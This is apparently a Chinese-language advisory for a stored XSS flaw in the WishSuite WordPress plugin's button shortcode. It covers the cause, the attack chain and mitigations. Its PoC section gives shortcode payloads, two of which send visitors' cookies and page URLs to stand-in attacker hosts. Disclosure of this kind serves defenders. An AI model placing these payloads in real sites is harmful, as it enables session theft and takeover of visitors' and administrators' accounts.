CVE-2025-13838 CVSS 6.4 中危

CVE-2025-13838 WishSuite WordPress插件存储型XSS漏洞

披露日期: 2025-12-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13838

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WishSuite WordPress插件

漏洞概述

CVE-2025-13838是WordPress WishSuite插件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于插件的'wishsuite_button'短代码的'button_text'参数中，由于插件在处理用户输入时未能进行充分的输入清理和输出转义，导致恶意JavaScript代码可以被存储在数据库中。攻击者利用此漏洞需要具有Contributor级别或更高的WordPress用户权限，成功利用后可将恶意脚本注入到页面中。当其他用户访问包含恶意代码的页面时，注入的脚本将自动执行，可能导致会话劫持、敏感信息窃取或管理员权限滥用等严重后果。此漏洞影响WishSuite插件1.5.1及以下所有版本，CVSS评分6.4，属于中危漏洞。

技术细节

该漏洞的根本原因在于WishSuite插件的wishsuite-button-add.php模板文件中，直接将用户可控的'button_text'参数输出到HTML页面而未进行适当的转义处理。攻击者通过使用wishsuite_button短代码并设置恶意构造的button_text参数值，可以注入任意JavaScript代码。由于数据被存储在数据库中（存储型XSS），恶意代码会持久存在于页面中，所有访问该页面的用户都会执行攻击者注入的脚本。攻击者通常利用此漏洞窃取用户Cookie、会话令牌，或在管理员访问时执行管理员操作。CVSS向量显示攻击复杂度低、无需特殊权限（Contributor级别即可）、无需用户交互，这使得漏洞利用相对简单。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用WishSuite插件，并确认插件版本<=1.5.1

STEP 2

权限获取

攻击者获取WordPress Contributor级别或更高权限的用户账户

STEP 3

漏洞利用

在页面或文章中插入包含恶意JavaScript代码的wishsuite_button短代码

STEP 4

代码存储

恶意代码被存储在WordPress数据库中，随页面内容持久存在

STEP 5

代码执行

其他用户访问包含恶意代码的页面时，浏览器自动执行注入的脚本

STEP 6

攻击成功

攻击者通过JavaScript获取用户Cookie、会话信息或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress页面或文章中插入以下短代码触发XSS -->
[wishsuite_button button_text='<script>alert(document.cookie)</script>']

<!-- 更隐蔽的XSS payload -->
[wishsuite_button button_text='<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>']

<!-- 窃取用户信息的payload -->
[wishsuite_button button_text='<script>var data={u:document.location.href,c:document.cookie};fetch("https://malicious-site.com/log?"+btoa(JSON.stringify(data)));</script>']

影响范围

WishSuite插件 <= 1.5.1

防御指南

临时缓解措施

如果无法立即升级插件，可临时采取以下措施：1) 限制具有短代码编辑权限的用户账户；2) 使用Web应用防火墙(WAF)规则拦截包含<script>标签的请求；3) 审查现有页面内容，删除已注入的恶意短代码；4) 考虑暂时禁用wishsuite_button短代码功能直到插件更新。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表